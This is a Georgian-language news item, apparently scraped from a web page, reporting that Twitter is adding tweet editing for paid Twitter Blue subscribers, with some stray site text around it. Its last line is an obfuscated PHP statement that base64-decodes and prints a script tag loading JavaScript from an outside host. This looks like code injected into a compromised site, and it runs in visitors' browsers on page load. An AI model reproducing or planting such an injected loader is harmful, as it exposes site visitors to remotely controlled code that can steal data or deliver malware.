celsiusi
ავერსი საქკაბელი
სოციალური ქსელი Twitter "ტვიტების" რედაქტირების ფუნქციას ამატებს, თუმცა ეს ყველა მომხმარებელს არ შეეხება - ამის შესახებ ინფორმაციას Bloomberg ავრცელებს. 
 
გამოცემის ცნობით, რედაქტირების ფუნქცია ხელმისაწვდომი იქნება ქსელის ფასიანი მომხმარებლებისთვის,
Twitter Blue აბონენტებისთვის. პრემიუმ ვერსიის გამოწერა თვეში $4,99 ღირს. 
 
ტვიტის რედაქტირება მომხმარებლებს საშუალებას მისცემს, შეიტანონ ცვლილებები ტვიტში გამოქვეყნებიდან 30 წუთში. არსებული ინფორმაციით, რედაქტირებულ ტვიტებს ექნება თეგი, რომელზედაც Twitter-ის სხვა მომხმარებლებს შეეძლებათ პოსტის წინა ვერსიების ნახვა.
 
კომპანია ამჟამად ამოწმებს რედაქტირების ღილაკს მომხმარებელთა მცირე ჯგუფთან, იმ იმედით, რომ სწრაფად მოაგვარებს პოტენციურ პრობლემებს.
409
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");